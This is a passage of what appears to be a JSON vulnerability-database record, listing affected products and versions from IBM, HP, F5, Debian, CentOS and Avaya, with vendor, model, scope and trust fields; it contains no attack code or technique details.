"scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v8400" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8400" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "bladecenter advanced management module 3.66g", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-476" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-471" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-467" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-453" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip wom hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip webaccelerator hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip webaccelerator hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip psm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip ltm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip edge gateway hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip edge gateway hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "big-ip edge gateway hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip edge gateway hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip edge gateway hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip edge gateway hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip edge gateway hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.00" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.00" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip asm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip analytics hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip analytics 11.0.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "one-x client enablement services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.02" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.01" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cms r17ac.h", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "cms r17ac.g", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura messaging", "scope": 